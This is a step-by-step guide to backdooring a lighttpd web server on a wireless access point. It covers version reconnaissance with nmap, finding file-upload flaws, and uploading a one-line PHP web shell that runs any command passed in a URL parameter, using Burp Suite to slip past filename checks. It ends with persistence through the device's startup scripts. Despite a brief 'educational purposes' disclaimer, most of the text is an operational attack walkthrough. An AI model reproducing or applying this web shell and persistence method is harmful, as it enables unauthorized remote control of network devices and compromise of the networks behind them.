TL;DR
This guide shows how to add a backdoor to a vulnerable lighttpd web server running on a wireless access point (AP). Warning: This is for educational purposes only. Using this information without permission is illegal and unethical. We’ll cover finding a vulnerability, creating a simple PHP backdoor, uploading it, and accessing it.
Steps
- Identify the Vulnerability
- First, determine the lighttpd version running on the AP. You can often find this in the web server’s banner page (e.g., by visiting
http://[AP_IP]/) or through network scanning tools like Nmap:nmap -p 80 [AP_IP].
- Search for known vulnerabilities associated with that specific version of lighttpd using resources like Exploit-DB (https://www.exploit-db.com/) or CVE databases (https://cve.mitre.org/). Look for vulnerabilities that allow arbitrary file uploads, remote code execution, or similar exploits.
- For this example, we’ll assume a vulnerability exists allowing unrestricted file uploads via a web form (a common scenario in older versions or misconfigured installations).
- Create the Backdoor
- A simple PHP backdoor can be created. Be extremely careful with this step, as backdoors are malicious code. This example is for demonstration only and should not be used in a production environment without thorough security review.
- Create a file named
backdoor.phpwith the following content:<?php system($_GET['cmd']); ?>. This backdoor executes any command passed through the ‘cmd’ parameter in the URL.
- Upload the Backdoor
- Exploit the identified vulnerability to upload
backdoor.phpto a writable directory on the AP. This often involves using a web form or exploiting a file upload function. - The exact method depends entirely on the specific vulnerability. If it’s a simple file upload, you might use a tool like Burp Suite to modify the HTTP request and bypass any filename restrictions.
- Common writable directories include
/tmp/,/var/www/html/uploads/or similar locations depending on the lighttpd configuration. Determine the correct path through reconnaissance (e.g., trying common paths). - Access the Backdoor
- Once uploaded, access the backdoor via a web browser using the following URL format:
http://[AP_IP]/[backdoor_path]/backdoor.php?cmd=[command]. Replace[AP_IP]with the AP’s IP address and[backdoor_path]with the directory where you uploaded the file. - For example, to execute the command ‘ls -l’, use:
http://192.168.1.100/uploads/backdoor.php?cmd=ls%20-l(note the URL encoding of the space). - Persistence (Optional, but recommended for demonstration)
- To maintain access even after a reboot, you can add the backdoor to the AP’s startup scripts. This is highly dependent on the AP’s operating system and configuration.
- For example, if the AP runs BusyBox Linux, you might modify
/etc/init.d/httpd(or similar) to execute your command upon startup. This requires root access, which may be obtained through further exploitation of vulnerabilities.
Important Considerations
- Security Risks: Backdoors are extremely dangerous and can compromise the entire network.
- Detection: Backdoors can often be detected by intrusion detection systems (IDS) or antivirus software.
- Ethical Hacking: Only perform these steps on systems you own or have explicit permission to test.